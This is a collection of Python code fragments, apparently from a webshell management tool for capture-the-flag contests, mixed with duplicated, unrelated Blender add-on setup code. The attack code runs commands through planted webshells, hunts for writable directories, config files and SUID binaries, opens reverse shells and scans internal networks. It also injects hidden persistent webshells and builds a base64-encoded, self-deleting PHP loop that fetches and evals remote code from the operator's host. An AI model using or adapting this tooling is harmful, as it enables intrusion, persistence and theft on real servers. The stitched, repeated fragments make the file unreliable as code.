def download_base(self, path, local_path):
Log.info("Ready to downloading file : %s" % path)
Log.info("Detacting local file exists...")
exists = os.path.exists(local_path)
if exists:
Log.info("Checking remote file (%s) hash..." % (path))
remote_hash = self.hash_remote_file(path)
Log.info("Find md5 of remote file (%s) : %s" % (path, remote_hash))
Log.info("Checking local file (%s) hash..." % (local_path))
local_hash = hash_file(local_path)
Log.info("Find md5 of local file (%s) : %s" %
(local_path, local_hash))
if remote_hash == local_hash:
Log.warning("File haved downloaded! Ignored!")
return
else:
Log.warning("File updated, downloading new version...")
else:
Log.error("Local file not exists...")
result = self.php_code_exec_token(
'echo base64_encode(file_get_contents("%s"));' % (path))
if result[0]:
Log.success("Fetch data success! Start saving...")
content = result[1]
with open(local_path, "wb") as f:
Log.info("Saving...")
f.write(content.decode("base64"))
Log.info("Download finished!")
else:
Log.error("Fetch data failed!")
def page(self):
start = (self.page_number - 1) * self.limit
end = start + self.limit
try:
list = self.collection[start:end]
return list
except Exception as detail:
Log.warning(detail)
return []
def page(self):
start = (self.page_number - 1) * self.limit
end = start + self.limit
try:
list = self.collection[start:end]
return list
except Exception as detail:
Log.warning(detail)
return []
def get_writable_directory(self):
command = "find %s -type d -writable" % (self.webroot)
output = self.auto_exec(command)
if output[0]:
if output[1] == "":
Log.warning("Nothing found!")
else:
Log.success("Found : \n%s" % output[1])
else:
Log.error("Error occured! %s" % output[1])
def get_config_file(self):
keywords = ["config", "db", "database"]
for key in keywords:
Log.info("Using keyword : [%s]..." % (key))
command = "find %s -name '*%s*'" % (self.webroot, key)
output = self.auto_exec(command)
if output[0]:
if output[1] == "":
Log.warning("Nothing found!")
else:
Log.success("Found : \n%s" % output[1])
else:
Log.error("Error occured! %s" % output[1])
def get_suid_binaries(self):
paths = ['/usr/local/sbin', '/usr/local/bin', '/usr/sbin', '/usr/bin', '/sbin', '/bin', '/usr/games', '/usr/local/games', '/snap/bin']
for path in paths:
command = "find %s -user root -perm -4000 -exec ls -ldb {} \;" % (path)
Log.info("Executing : %s" % (command))
output = self.auto_exec(command)
if output[0]:
if output[1] == "":
Log.warning("Nothing found!")
else:
Log.success("Found : \n%s" % output[1])
else:
Log.error("Error occured! %s" % output[1])
def check_connection(self, url):
Log.info("Checking the connection to the webshell...")
try:
response = requests.head(url)
code = response.status_code
if code != 200:
Log.warning("The status code is %d, the webshell may have some problems..." % (response.status_code))
else:
Log.success("The status code is %d" % (response.status_code))
return True
except:
Log.error("Connection error!")
return False
def get_disabled_functions(self):
if len(self.disabled_functions) != 0:
Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
return
result = self.php_code_exec_token("echo ini_get('disable_functions');")
if result[0]:
if result[1] == "":
Log.warning("No function disabled!")
self.disabled_functions = []
else:
self.disabled_functions = result[1].split(",")[0:-1]
Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
else:
Log.error("Error occured! %s" % result[1])
def get_writable_directory(self):
command = "find %s -type d -writable" % (self.webroot)
output = self.auto_exec(command)
if output[0]:
if output[1] == "":
Log.warning("Nothing found!")
return []
else:
Log.success("Found : \n%s" % output[1][0:-1])
writable_dirs = []
for d in output[1].split("\n")[0:-1]:
if not d.startswith("find: '"):
writable_dirs.append(d)
return writable_dirs
else:
Log.error("Error occured! %s" % output[1])
return []
def show_options(self):
Log.warning("Options\t\tNecessity\t\tDefault")
Log.warning("-------\t\t---------\t\t-------")
for key in sorted(self.config.keys()):
Log.warning(
"%s\t\t%s\t\t\t%s" %
(key, self.config[key]["necessity"], self.get_config(key)))
def show_options(self):
'''
输出该模块的选项信息 (即之前定义的 config)
由 options 命令触发
通常不需要改动
'''
Log.warning("Options\t\tNecessity\t\tDefault")
Log.warning("-------\t\t---------\t\t-------")
for key in sorted(self.config.keys()):
Log.warning("%s\t\t%s\t\t\t%s" % (
key, self.config[key]["necessity"], self.get_config(key)))
#"space_view3d_Meta-Tools_0-3_tab",
"mass_align",
"modifier_tool",
"subdiv_tool",
"wireframe_toggle",
"DeadlineBlenderClient",
"custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon
"cubesurfer",
]
import addon_utils
for addon in addon_startup_list:
try:
addon_utils.enable(addon, default_set=True)
except:
log.warning("Could not enable addon %s - skipped" % addon)
else:
log.info("Loaded addon %s" % addon)
# Setup defaults - base this on the show. TODO: un-hardcode this
# Basic render settings
bpy.context.scene.render.fps = 24
bpy.context.scene.render.resolution_x = 1440
bpy.context.scene.render.resolution_y = 810
bpy.context.scene.render.resolution_percentage = 100
bpy.context.scene.render.pixel_aspect_x = 1.0
bpy.context.scene.render.pixel_aspect_y = 1.0
# Store the current render engine - we need to restore this after
render_engine = bpy.context.scene.render.engine
#"space_view3d_Meta-Tools_0-3_tab",
"mass_align",
"modifier_tool",
"subdiv_tool",
"wireframe_toggle",
"DeadlineBlenderClient",
"custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon
"cubesurfer",
]
import addon_utils
for addon in addon_startup_list:
try:
addon_utils.enable(addon, default_set=True)
except:
log.warning("Could not enable addon %s - skipped" % addon)
else:
log.info("Loaded addon %s" % addon)
# Setup defaults - base this on the show. TODO: un-hardcode this
# Basic render settings
bpy.context.scene.render.fps = 24
bpy.context.scene.render.resolution_x = 1440
bpy.context.scene.render.resolution_y = 810
bpy.context.scene.render.resolution_percentage = 100
bpy.context.scene.render.pixel_aspect_x = 1.0
bpy.context.scene.render.pixel_aspect_y = 1.0
# Store the current render engine - we need to restore this after
def main():
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
default_filename = "webshells"
banner()
webshells = []
if len(sys.argv) == 2:
filename = sys.argv[1]
Log.info("Loding from file : %s ..." % (filename))
webshells_config = json.load(open(filename))
for webshell_config in webshells_config:
webshell = WebShell(webshell_config['url'],
webshell_config['method'],
webshell_config['password'])
if webshell.working:
Log.success(
"This webshell works well, adding into online list...")
SAME_FLAG = False
for online_webshell in webshells:
if online_webshell.url == webshell.url:
Log.warning("Same webshell detected! Skipping...")
SAME_FLAG = True
break
if SAME_FLAG:
continue
webshells.append(webshell)
else:
Log.error("This webshell can not work...")
Log.info("Loading file finished!")
if len(webshells) == 0:
Log.error("No webshell works well, exiting...")
exit(2)
Log.info("%d webshells alive!" % (len(webshells)))
Log.info("Entering interactive mode...")
elif len(sys.argv) == 4:
url = sys.argv[1]
method = sys.argv[2]
password = sys.argv[3]
webshell = WebShell(url, method, password)
if webshell.working:
Log.success("This webshell works well, adding into online list...")
webshells.append(webshell)
else:
Log.error("This webshell can not work...")
exit(3)
else:
show_help()
exit(1)
LOCAL_COMMAND_FLAG = True
main_help()
while True:
Log.context("sniper")
context_fresh = raw_input("=>") or "h"
context = string.lower(context_fresh)
if context == "h" or context == "help" or context == "?":
main_help()
#elif context == "sh" or context == "shell":
# shell = Shell(webshell)
# shell.interactive()
elif context == "rsh" or context == "rshell":
Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
ip = raw_input("[IP] : (%s)" %
(get_ip_address())) or get_ip_address()
port = raw_input("[PORT] : (8888)") or "8888"
Log.info("Starting reverse shell (%s:%s)" % (ip, port))
for webshell in webshells:
Log.info(str(webshell.info))
webshell.reverse_shell(ip, port)
elif context == "p" or context == "print":
for webshell in webshells:
Log.info(str(webshell.info))
webshell.print_info()
elif context == "pv" or context == "php_version":
for webshell in webshells:
Log.info(str(webshell.info))
Log.success(webshell.get_php_version())
elif context == "kv" or context == "kernel_version":
for webshell in webshells:
Log.info(str(webshell.info))
Log.success(webshell.get_kernel_version())
elif context == "c" or context == "config":
for webshell in webshells:
Log.info(str(webshell.info))
Log.info("Detacting config files...")
webshell.get_config_file()
elif context == "fwd":
for webshell in webshells:
Log.info(str(webshell.info))
webshell.get_writable_directory()
elif context == "gdf":
for webshell in webshells:
Log.info(str(webshell.info))
webshell.get_disabled_functions()
elif context == "fwpf":
for webshell in webshells:
Log.info(str(webshell.info))
webshell.get_writable_php_file()
elif context == "fsb":
for webshell in webshells:
Log.info(str(webshell.info))
webshell.get_suid_binaries()
elif context == "setr":
LOCAL_COMMAND_FLAG = False
elif context == "setl":
LOCAL_COMMAND_FLAG = True
elif context == "dla":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
args = raw_input("Please custom find args (%s) : " %
(" -size 500k")) or " -size 500k"
Log.info("Using command : find %s %s" % (path, args))
for webshell in webshells:
Log.info(str(webshell.info))
webshell.download_advanced(path, args)
elif context == "dl":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
for webshell in webshells:
Log.info(str(webshell.info))
if not webshell.file_exists(path):
Log.error("The file [%s] is not exists on the server!" %
(path))
continue
if webshell.is_directory(path):
Log.info(
"The target file is a directory, using recursion download..."
)
filename_filter = raw_input("Input --name '%s' : " %
("*.php")) or "*.php"
webshell.download_recursion(path, filename_filter)
else:
#filename = path.split("/")[-1]
#local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
# Log.info("Using root path : [%s] to save!" % (local_path))
Log.info(
"The target file is a single file, starting download..."
)
webshell.download(path, path)
elif context == "ps":
hosts = raw_input(
"Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
if not "/" in hosts:
Log.error(
"Please use the format IP/MASK , if want to scan a single host , set MASK=32"
)
continue
ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
) or "21,22,25,80,443,445,3389"
for webshell in webshells:
Log.info(str(webshell.info))
webshell.port_scan(hosts, ports)
elif context == "aiw":
default_filename = random_string(0x10, string.letters)
default_password = md5(
md5("%s%s%s" % (salt, default_filename, salt)))
filename = raw_input("Filename (.%s.php): " %
(default_filename)) or (".%s.php" %
(default_filename))
password = raw_input("Password (%s): " %
(default_password)) or ("%s" %
(default_password))
for webshell in webshells:
Log.info(str(webshell.info))
webshell.auto_inject_webshell(filename, password)
elif context == "aimw":
default_filename = random_string(0x10, string.letters)
default_password = md5(
md5("%s%s%s" % (salt, default_filename, salt)))
filename = raw_input("Filename (.%s.php): " %
(default_filename)) or (".%s.php" %
(default_filename))
password = raw_input("Password (%s): " %
(default_password)) or ("%s" %
(default_password))
for webshell in webshells:
Log.info(str(webshell.info))
webshell.auto_inject_memery_webshell(filename, password)
elif context == "fr":
Log.info("Starting flag reaper...")
webserver_host = raw_input("[IP] (%s) : " %
(get_ip_address())) or get_ip_address()
webserver_port = int(raw_input("[PORT] (80) : ") or "80")
filename = ".%s.php" % (random_string(0x10, string.letters))
file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
webserver_host, webserver_port)
Log.info("Temp memory phpfile : %s" % (file_content))
Log.info("Encoding phpfile...")
file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
file_content.encode("base64").replace("\n", ""))
Log.info("Final memory phpfile : %s" % (file_content))
for webshell in webshells:
Log.info(str(webshell.info))
result = webshell.auto_inject_flag_reaper(
filename, file_content)
if result:
Log.success(
"Please check the web server(%s:%d) log to get your flag!"
% (webserver_host, webserver_port))
Log.info("Tips : tail -f /var/log/apache2/access.log")
else:
Log.error("Starting flag reaper failed!")
elif context == "r" or context == "read":
filepath = raw_input(
"Input file path (/etc/passwd) : ") or "/etc/passwd"
for webshell in webshells:
Log.info(str(webshell.info))
webshell.read_file(filepath)
elif context == "db" or context == "database":
ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
username = raw_input("Username (root): ") or "root"
password = raw_input("Password (root): ") or "root"
Log.info("Creating connection by [%s:%s] to [%s]..." %
(username, password, ip))
for webshell in webshells:
Log.info(str(webshell.info))
mysql_connection = Mysql(webshell, ip, username, password)
if not mysql_connection.function:
Log.error("The target server cannot support mysql!")
continue
if not mysql_connection.connection_flag:
Log.error("Connection failed!")
continue
Log.success("Connection success!")
if mysql_connection.function != "":
Log.success("Entering database server interactive mode...")
mysql_connection.interactive()
else:
Log.error("No supported database function!")
elif context == "q" or context == "quit" or context == "exit":
Log.info("recording this webshell to the log file...")
save_webshells(webshells,
"%s_%d.json" % (default_filename, time.time()))
Log.info("Quiting...")
break
else:
Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.info("Executing command on localhost...")
os.system(context_fresh)
else:
Log.info("Executing command on target server...")
for webshell in webshells:
Log.info(str(webshell.info))
webshell.auto_exec_print(context_fresh)
